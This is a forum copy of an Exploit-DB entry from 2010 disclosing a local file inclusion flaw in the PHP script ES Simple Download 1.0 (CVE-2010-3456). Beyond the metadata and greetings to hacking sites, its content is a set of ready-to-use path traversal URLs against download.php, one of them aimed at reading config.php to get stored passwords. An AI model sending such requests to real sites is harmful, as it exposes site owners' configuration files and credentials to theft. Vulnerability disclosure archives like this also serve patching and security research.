- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 14960
- Проверка EDB
-
- Пройдено
- Автор
- KAZZA
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2010-3456
- Дата публикации
- 2010-09-09
ES Simple Download 1.0. - Local File Inclusion
Код:
----------------------------Information------------------------------------------------
+Name : ES Simple Download v 1.0. Local File Exclusion/LFI
+Autor : Kazza
+email : [email protected]
+Date : 09.09.2010
+Script : ES Simple Download v 1.0.
+Price : Freeware
+Language :PHP
+Discovered by Kazza
+Security Group : -GST-German Security Team-
+And all Friends Sites : http://md5cracker.tk - http://gulli.com - http://free-hack.com
----------------------------Vulnerability-----------------------------------------------
+Download : www.energyscripts.com/projects/essdownload/essdownload1.0.zip
+Vulnerability : www.your script/download.php?PHPSESSID="Your Senssid"&file=../*****
+Password Exploitable : www.your script/download.php?PHPSESSID="Your Senssid"&file=../../config.php
------------------------------------------------------------------------------------------ Источник
- www.exploit-db.com
